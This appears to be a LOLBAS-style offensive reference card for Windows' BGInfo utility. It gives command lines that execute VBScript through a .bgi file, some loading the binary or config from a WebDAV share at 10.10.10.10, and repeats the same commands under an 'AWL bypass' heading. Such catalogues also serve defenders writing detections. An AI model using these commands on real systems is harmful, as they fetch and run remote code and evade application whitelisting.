~/Privilege Escalation/Windows/Binaries# cat Bginfo.exe.md █
Background Information Utility included with SysInternals Suite
Paths:
No fixed path
Detection:
Execute
Execute VBscript code that is referenced within the bginfo.bgi file.
bginfo.exe bginfo.bgi /popup /nolicprompt
Execute bginfo.exe from a WebDAV server.
\\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
This style of execution may not longer work due to patch.
\\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
AWL bypass
Execute VBscript code that is referenced within the bginfo.bgi file.
bginfo.exe bginfo.bgi /popup /nolicprompt
Execute bginfo.exe from a WebDAV server.
\\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
This style of execution may not longer work due to patch.
\\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt